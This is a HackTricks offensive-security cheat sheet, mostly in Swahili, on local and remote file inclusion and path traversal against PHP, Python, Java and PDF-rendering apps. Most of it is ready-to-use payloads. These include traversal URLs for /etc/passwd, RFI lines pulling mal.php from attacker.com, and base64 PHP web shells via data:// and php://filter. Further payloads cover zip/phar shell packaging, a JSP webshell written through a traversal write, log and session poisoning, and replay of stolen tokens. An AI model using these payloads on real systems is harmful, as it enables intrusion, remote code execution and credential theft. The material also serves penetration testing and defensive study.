File Inclusion/Path traversal

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

File Inclusion

Remote File Inclusion (RFI): Faili inasomwa kutoka kwenye server ya mbali (Bora: Unaweza kuandika code na server itaiendesha). Katika php hii ni imezimwa kwa default (allow_url_include).
Local File Inclusion (LFI): Server inapakia faili ya ndani.

Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili ambayo server itapakia.

Funsi za PHP zilizo hatarini: require, require_once, include, include_once

Chombo kizuri cha ku-exploit udhaifu huu: https://github.com/kurobeats/fimap

Blind - Inayovutia - LFI2RCE mafaili

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

*Kwa kuchanganya orodha kadhaa za nix LFI na kuongeza njia zaidi nimeunda hii:

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt

Jaribu pia kubadilisha / kwa \
Jaribu pia kuongeza ../../../../../

A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found here

Windows

Muungano wa wordlists tofauti:

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt

Jaribu pia kubadilisha / kwa \
Jaribu pia kuondoa C:/ na kuongeza ../../../../../

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here

OS X

Angalia orodha ya LFI ya linux.

Msingi LFI na bypasses

Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

traversal sequences zilitolewa bila kutumia rekursivu

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass kuongeza herufi zaidi mwishoni mwa string iliyotolewa (bypass of: $_GET[‘param’].“php”)

http://example.com/index.php?page=../../../etc/passwd%00

Hii ni imetatuliwa tangu PHP 5.4

Encoding

Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na nyingine):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

HTML-to-PDF SVG/IMG path traversal

Modern HTML-to-PDF engines (e.g. TCPDF or wrappers such as html2pdf) happily parse attacker-provided HTML, SVG, CSS, and font URLs, yet they run inside trusted backend networks with filesystem access. Once you can inject HTML into $pdf->writeHTML()/Html2Pdf::writeHTML(), you can often exfiltrate local files that the web server account can read.

• Fingerprint the renderer: kila PDF iliyotengenezwa ina uwanja wa Producer (mfano TCPDF 6.8.2). Kujua build halisi kunakuambia ni vichujio gani vya path vilivyopo na ikiwa URL decoding hufanyika kabla ya uthibitisho.
• Inline SVG payloads: TCPDF::startSVGElementHandler() husoma sifa ya xlink:href kutoka kwa elementi za <image> kabla ya kuendesha urldecode(). Kuingiza SVG hatarishi ndani ya data URI kunafanya HTML sanitizers wengi wapuuze payload wakati TCPDF bado inaiparse:

<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxpbWFnZSB4bGluazpocmVmPSIuLi8uLi8uLi8uLi8uLi90bXAvdXNlcl9maWxlcy91c2VyXzEvcHJpdmF0ZV9pbWFnZS5wbmciIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz48L3N2Zz4=" />

TCPDF huongeza $_SERVER['DOCUMENT_ROOT'] kwenye paths zinazoanza na / na hutatua .. tu baadaye, kwa hivyo tumia sehemu zinazoanza na ../../.. au /../../.. ili kutoroka root baada ya kuongezwa kwa mbele.

• Encoding ili kupitisha vichungi dhaifu: Toleo ≤6.8.2 hukagua tu substring halisi ../ kabla ya ku-decoding URL. Kutuma ..%2f (au ..%2F) katika SVG au katika raw <img src> attribute hupitisha ukaguzi, kwa sababu mfululizo wa traversal dot-dot-slash huundwa tena tu baada TCPDF kuitisha urldecode().
• Double-encoding kwa multi-stage decoding: Ikiwa input ya mtumiaji ina-decode na web framework na na TCPDF, double-encode slash (%252f). Decode moja inabadilisha kuwa %2f, decode ya pili katika TCPDF inabadilisha kuwa /, ikitoa /..%252f.. → /../../../… bila kamwe kuonyesha ../ kwa chujio la mapema.
• HTML <img> handler: TCPDF::openHTMLTagHandler() ina mdudu sawa wa order-of-operations, ukiruhusu payload za HTML za moja kwa moja kama src="%2f..%252f..%252ftmp%252fsecret.png" kusoma bitmap yoyote inayoweza kufikiwa kwa ndani.

Mbinu hii leaks chochote kinachosomwa na PDF worker (passport scans, API keys zilizoonyeshwa kama images, n.k.). Hardeners walirekebisha katika 6.9.1 kwa kufanyisha canonicalisation ya paths (isRelativePath()), hivyo wakati wa majaribio pendelea toleo la Producer la zamani.

Kutoka kwenye folda iliyopo

Huenda back-end inakagua njia ya folda:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Kuchunguza Saraka za Mfumo wa Faili kwenye Server

Mfumo wa faili wa server unaweza kuchunguzwa kwa kurudia ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kutambua kina cha saraka na kuchunguza uwepo wa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:

1. Determine Directory Depth: Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili /etc/passwd (inayotumika ikiwa server ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, ikionyesha kina cha tatu:

http://example.com/index.php?page=../../../etc/passwd # depth of 3

2. Probe for Folders: Ongeza jina la folda inayoshukiwa (kwa mfano, private) kwenye URL, kisha rudi kwenye /etc/passwd. Ngazi ya ziada ya directory inahitaji kuongeza depth kwa 1:

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4

3. Tafsiri Matokeo: Jibu la server linaonyesha kama folda ipo:

• Hitilafu / Hakuna Matokeo: Folda private inawezekana haipo katika eneo lililotajwa.
• Yaliyomo ya /etc/passwd: Uwepo wa folda private umethibitishwa.

4. Uchunguzi wa Kurudia: Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya saraka ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI) methods.

Ili kuchunguza saraka katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kukagua kama /var/www/ ina saraka private (kwa kuzingatia saraka ya sasa iko kwa kina cha 3), tumia:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Path Truncation Technique

Path truncation ni mbinu inayotumika kuchezea njia za faili katika programu za wavuti. Mara nyingi hutumika kupata faili zilizozuiwa kwa kuepuka hatua fulani za usalama ambazo huongeza herufi za ziada mwishoni mwa njia za faili. Lengo ni kutengeneza njia ya faili ambayo, baada ya kubadilishwa na hatua ya usalama, bado inaelekeza kwenye faili linalohitajika.

In PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuchukuliwa sawa kutokana na tabia ya mfumo wa faili. Kwa mfano:

• /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ zote huchukuliwa kama njia ile ile.
• When the last 6 characters are passwd, appending a / (making it passwd/) doesn’t change the targeted file.
• Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.

Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia /etc/passwd, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za watumiaji):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

Katika vigezo hivi, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa server.

• Using Dot Segments and Additional Characters: Traversal sequences (../) zilizochanganywa na dot segments za ziada na herufi zinaweza kutumika kusogea kwenye mfumo wa faili, kwa ufanisi zikimsahau strings zilizoongezwa na server.
• Determining the Required Number of Traversals: Kupitia jaribio na makosa, mtu anaweza kubaini idadi sahihi ya ../ zinazohitajika kufika kwenye root directory na kisha /etc/passwd, kuhakikisha kwamba strings zilizoongezwa (k.m. .php) zimetatuliwa ili zisilete athari, lakini path inayotakikana (/etc/passwd) inabaki bila kuathiriwa.
• Starting with a Fake Directory: Ni desturi ya kawaida kuanza path na directory isiyokuwepo (k.m. a/). Mbinu hii inatumiwa kama tahadhari au ili kutimiza mahitaji ya mantiki ya server katika kuchambua path.

When employing path truncation techniques, ni muhimu kuelewa tabia ya server katika kuchambua path na muundo wa mfumo wa faili. Kila senario inaweza kuhitaji mbinu tofauti, na majaribio mara nyingi yanahitajika ili kupata mbinu yenye ufanisi zaidi.

Udhaifu huu ulirekebishwa katika PHP 5.3.

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

In php hii imezimwa kwa chaguo-msingi kwa sababu allow_url_include iko Off. Inapaswa kuwa On ili ifanye kazi, na katika hali hiyo unaweza include faili ya PHP kutoka kwenye server yako na kupata RCE:

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Ikiwa kwa sababu fulani allow_url_include iko On, lakini PHP inazuia upatikanaji wa kurasa za mtandao za nje kwa kutumia filtering, kulingana na chapisho hiki, unaweza kutumia kwa mfano data protocol pamoja na base64 ku-decode code ya PHP ya b64 na kupata RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Tip

Katika msimbo uliotangulia, +.txt ya mwisho iliongezwa kwa sababu mshambuliaji alihitaji kamba iliyoisha kwa .txt, hivyo kamba inamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha taka tu na msimbo halisi wa PHP utaingizwa (na kwa hivyo, utekelezwe).

Mfano mwingine usiotumia protokoli ya php:// ungekuwa:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Python Kipengele cha mzizi

Katika python katika msimbo kama huu:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

Ikiwa mtumiaji anapitisha absolute path kwa file_name, njia ya awali inaondolewa tu:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

Hii ni tabia iliyokusudiwa kulingana na the docs:

Ikiwa kipengele ni njia kamili, vipengele vyote vilivyotangulia vitakatwa na kuunganishwa kunaendelea kutoka kipengele cha njia kamili.

Java Orodha za Direktori

Inaonekana kwamba ikiwa una Path Traversal katika Java na unaomba direktori badala ya faili, orodha ya direktori inarudishwa. Hii haitatokea katika lugha nyingine (kwa kadiri ninavyojua).

Vigezo 25 Bora

Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI kutumia PHP wrappers na protokoli

php://filter

PHP filters zinaruhusu kufanya operesheni za msingi za mabadiliko kwenye data kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:

• String Filters:
• string.rot13
• string.toupper
• string.tolower
• string.strip_tags: Ondoa tagi kutoka kwa data (kila kitu kati ya herufi “<” na “>”)
• Kumbuka kichujio hiki kimeondolewa katika matoleo ya kisasa ya PHP
• Conversion Filters
• convert.base64-encode
• convert.base64-decode
• convert.quoted-printable-encode
• convert.quoted-printable-decode
• convert.iconv.* : Hubadilisha kuwa encoding tofauti (convert.iconv.<input_enc>.<output_enc>). Ili kupata orodha ya encoding zote zinazotimizwa endesha kwenye console: iconv -l

Warning

Kwa kutumia vibaya kichujio cha kubadilisha convert.iconv.* unaweza kutengeneza maandishi yoyote, ambayo inaweza kuwa ya msaada kuandika maandishi yoyote au kufanya function kama include ichukue maandishi yoyote. Kwa taarifa zaidi angalia LFI2RCE via php filters.

• Compression Filters
• zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
• zlib.inflate: Decompress the data
• Encryption Filters
• mcrypt.* : Imepitwa na wakati
• mdecrypt.* : Imepitwa na wakati
• Other Filters
• Ikiendesha kwenye php var_dump(stream_get_filters()); utaona vichujio vichache visivyotarajiwa:
• consumed
• dechunk: reverses HTTP chunked encoding
• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

Warning

Sehemu “php://filter” haiangalii herufi kubwa/ndogo

Kutumia php filters kama oracle kusoma faili yoyote

In this post inatoa mbinu ya kusoma faili ya ndani bila kurudishiwa output na server. Teknika hii inategemea boolean exfiltration of the file (char by char) using php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumiwa kuongeza ukubwa wa maandishi kiasi kwamba php itatupa exception.

Katika post ya awali unaweza kupata maelezo ya kina ya mbinu, lakini hapa kuna muhtasari mfupi:

• Tumia codec UCS-4LE kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa kasi.
• Hii itatumika kuzalisha text so big when the initial letter is guessed correctly kiasi kwamba php itasababisha error
• Filter ya dechunk ita remove everything if the first char is not an hexadecimal, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
• Hii, ikichanganywa na ile ya awali (na filters nyingine kulingana na herufi inayokisiwa), itaturuhusu kukisia herufi mwanzoni mwa text kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe character ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitaitoa na bomu la awali litasababisha php error.
• Codec convert.iconv.UNICODE.CP930 hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inatufanya kugundua ikiwa herufi ya kwanza ni a kwa mfano, kwa sababu tukitumia codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena character ya hexadecimal, hivyo dechunk haitaitoa na php error itachochewa kwa sababu inazidiana na bomu la awali.
• Kwa kutumia mabadiliko mengine kama rot13 mwanzoni inawezekana ku-leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine kwenye safu ya hex).
• Wakati char ya kwanza ni namba inahitajika ku-base64 encode na leak herufi 2 za kwanza ili kupata nambari.
• Tatizo la mwisho ni kuona how to leak more than the initial letter. Kwa kutumia order memory filters kama convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE inawezekana kubadilisha mpangilio wa chars na kupata nafasi ya kwanza herufi nyingine za maandishi.
• Na ili uweze kupata further data wazo ni generate 2 bytes of junk data at the beginning kwa convert.iconv.UTF16.UTF16, tumia UCS-4LE kuiifanya pivot with the next 2 bytes, na delete the data until the junk data (hii itaondoa the first 2 bytes of the initial text). Endelea kufanya hivyo hadi ufikie sehemu unayotaka ku-leak.

Katika post pia ilitolewa zana ya kutekeleza hili moja kwa moja: php_filters_chain_oracle_exploit.

php://fd

Wrapper hii inaruhusu kufikia file descriptors ambazo process imefungua (open). Inaweza kuwa muhimu ku-exfiltrate content ya opened files:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

Unaweza pia kutumia php://stdin, php://stdout and php://stderr kupata vielezi vya faili 0, 1 na 2 mtawalia (sijui hii inaweza kuwa na msaada vipi katika shambulio)

zip:// and rar://

Pakia faili la Zip au Rar lenye PHPShell ndani na upate ufikiaji wake.
Ili kuweza kutumia rar protocol vibaya, inahitaji kuamilishwa mahsusi

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kumbuka kwamba protokoli hii imezuiwa na mipangilio ya php allow_url_open na allow_url_include

expect://

Expect lazima iwe imeamilishwa. Unaweza kutekeleza code ukitumia ifuatayo:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Taja payload yako katika POST parameters:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

Faili la .phar linaweza kutumika kutekeleza code ya PHP wakati web application inatumia functions kama include kwa ajili ya kupakia faili. Kipande cha code cha PHP kilichoonyeshwa hapa chini kinaonyesha uundaji wa faili la .phar:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

Ili kuunda faili ya .phar, amri ifuatayo inapaswa kutekelezwa:

php --define phar.readonly=0 create_path.php

Baada ya kutekelezwa, faili iitwayo test.phar itaundwa, ambayo inaweza kutumika kujaribu kuchochea Local File Inclusion (LFI).

Katika kesi ambapo LFI inasoma tu faili bila kuendesha msimbo wa PHP ndani yake, kupitia functions kama file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), au filesize(), inaweza kujaribiwa kutekeleza deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

Ilikuwa inawezekana kutumia vibaya any arbitrary file read from PHP that supports php filters ili kupata RCE. Maelezo ya kina yanaweza kupatikana katika found in this post.
Muhtasari mfupi: 3 byte overflow katika PHP heap ilitumiwa kualter the chain of free chunks za anspecific size ili kuwawezesha write anything in any address, hivyo hook iliongezwa kuitwa system.
Ilikuwa inawezekana alloc chunks za specific sizes kwa kutumia php filters zaidi.

Protokoli zaidi

Angalia zaidi ya protocols to include here:

• php://memory and php://temp — Write in memory or in a temporary file (sio wazi ni jinsi gani hii inaweza kuwa muhimu katika file inclusion attack)
• file:// — Accessing local filesystem
• http:// — Accessing HTTP(s) URLs
• ftp:// — Accessing FTP(s) URLs
• zlib:// — Compression Streams
• glob:// — Find pathnames matching pattern (Haiirudishi chochote kinachochapishwa, hivyo sio muhimu hapa)
• ssh2:// — Secure Shell 2
• ogg:// — Audio streams (Haifai kusoma arbitrary files)

LFI via PHP’s ‘assert’

Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa linapohusiana na function ya ‘assert’, ambayo inaweza kutekeleza code ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha characters za directory traversal kama “..” inakaguliwa lakini haijasafishwa ipasavyo.

Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:

assert("strpos('$file', '..') === false") or die("");

Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaunda vector ya code injection. Ili kutumia hili kama exploit kwa kusoma yaliyomo ya faili, mshambuliaji anaweza kutumia:

' and die(highlight_file('/etc/passwd')) or '

Vivyo hivyo, kwa ajili ya executing arbitrary system commands, mtu anaweza kutumia:

' and die(system("id")) or '

Ni muhimu URL-encode these payloads.

PHP Blind Path Traversal

Warning

Mbinu hii inafaa katika kesi ambapo una control ya file path ya PHP function ambayo ita access a file, lakini hutaona maudhui ya faili (kama simple call to file()) na maudhui hayajaonyeshwa.

In this incredible post imeelezwa jinsi blind path traversal inaweza kutumiwa via PHP filter ili exfiltrate the content of a file via an error oracle.

Kwa muhtasari, mbinu inatumia “UCS-4LE” encoding kufanya maudhui ya faili kuwa yenye ukubwa mkubwa sana kiasi kwamba PHP function opening faili itasababisha error.

Kisha, ili leak the first char filter dechunk inatumiwa pamoja na nyingine kama base64 au rot13 na hatimaye filters convert.iconv.UCS-4.UCS-4LE na convert.iconv.UTF16.UTF-16BE zinatumika kuweka chars nyingine mwanzoni na ku-leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Kwa maelezo ya kiufundi angalia chapisho lililotajwa!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

Wakati server-side code inayopokea/kupload files inajenga destination path kwa kutumia user-controlled data (mfano, filename au URL) bila canonicalising na validating, .. segments na absolute paths zinaweza kutoroka directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kawaida unapata unauthenticated RCE kwa ku-drop webshell.

Typical exploitation workflow:

• Identify a write primitive in an endpoint or background worker that accepts a path/filename and writes content to disk (e.g., message-driven ingestion, XML/JSON command handlers, ZIP extractors, etc.).
• Determine web-exposed directories. Common examples:
• Apache/PHP: /var/www/html/
• Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
• IIS: C:\inetpub\wwwroot\ → drop shell.aspx
• Craft a traversal path that breaks out of the intended storage directory into the webroot, and include your webshell content.
• Browse to the dropped payload and execute commands.

Maelezo:

• The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
• On Java stacks, these file writes are often implemented with simple File/Paths concatenation. Lack of canonicalisation/allow-listing is the core flaw.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>

Ngomezo zinazozizuia aina hii ya mende:

• Tumia canonical path na uhakikishe kuwa ni mtokeo (descendant) wa base directory iliyoruhusiwa.
• Kataa njia yoyote inayojumuisha .., absolute roots, au drive letters; pendelea generated filenames.
• Endesha writer kama akaunti yenye ruhusa ndogo (low-privileged) na gawanya write directories mbali na served roots.

Remote File Inclusion

Explained previously, follow this link.

Via Apache/Nginx log file

Ikiwa server ya Apache au Nginx ni vulnerable to LFI ndani ya include function unaweza kujaribu kufikia /var/log/apache2/access.log or /var/log/nginx/access.log, kuweka ndani ya user agent au ndani ya GET parameter php shell kama <?php system($_GET['c']); ?> na include faili hiyo

Warning

Note that if you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string “quote;”, PHP will throw an error there and nothing else will be executed.

Pia, hakikisha umeandika payload kwa usahihi au PHP itatoa hitilafu kila inapojaribu kuipakia faili ya log na hautapata fursa ya pili.

Hii pia inaweza kufanywa katika logi nyingine lakini uwa mwangalifu, msimbo ndani ya logi unaweza kuwa URL encoded na hii inaweza kuharibu Shell. The header authorisation “basic” contains “user:password” in Base64 na inabadilishwa (decoded) ndani ya logi. The PHPShell inaweza kuingizwa ndani ya header hii.
Other possible log paths:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Soma access logs ili kupata GET-based auth tokens (token replay)

Programu nyingi kwa makosa zinakubali session/auth tokens kupitia GET (mfano AuthenticationToken, token, sid). Ikiwa una primitive ya path traversal/LFI kwa web server logs, unaweza kuiba tokens hizo kutoka access logs na kuzireplay ili kupita authentication kabisa.

Jinsi ya kufanya:

• Tumia traversal/LFI kusoma web server access log. Maeneo ya kawaida:
• /var/log/apache2/access.log, /var/log/httpd/access_log
• /var/log/nginx/access.log
• Mara nyingine endpoints hurudisha file reads Base64-encoded. Kama ni hivyo, decode ndani yako (locally) na chunguza mistari ya log.
• Tumia grep kutafuta GET requests zinazo include parameter ya token na capture thamani yake, kisha replay dhidi ya application entry point.

Mfano wa mtiririko (kwa jumla):

GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target

Dekoda mwili ikiwa ni Base64, kisha rudia token iliyorekodiwa:

GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target

Vidokezo:

• Tokens in URLs are logged by default; never accept bearer tokens via GET in production systems.
• If the app supports multiple token names, search for common keys like AuthenticationToken, token, sid, access_token.
• Rotate any tokens that may have leaked to logs.

Kupitia Barua pepe

Tuma barua pepe kwa akaunti ya ndani (user@localhost) yenye PHP payload yako kama <?php echo system($_REQUEST["cmd"]); ?> na jaribu ku-include kwenye barua pepe ya mtumiaji kwa njia kama /var/mail/<USERNAME> au /var/spool/mail/<USERNAME>

Kupitia /proc//fd/

1. Pakia shells nyingi (kwa mfano: 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Kupitia /proc/self/environ

Kama faili ya log, tuma payload kwenye User-Agent; itaonekana ndani ya faili /proc/self/environ

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Kupitia kupakia

Ikiwa unaweza kupakia faili, chomeka tu shell payload ndani yake (mfano: <?php system($_GET['c']); ?> ).

http://example.com/index.php?page=path/to/uploaded/file.png

Ili faili ibaki rahisi kusoma, ni bora kuingiza kwenye metadata ya pictures/doc/pdf

Kupitia Zip file upload

Pakia faili la ZIP lenye PHP shell iliyoshinikizwa na upate:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Kupitia PHP sessions

Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

Katika PHP, hizi sessions zimehifadhiwa kwenye /var/lib/php5/sess\[PHPSESSID]_ files

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Weka cookie kuwa <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Tumia LFI kujumuisha PHP session file

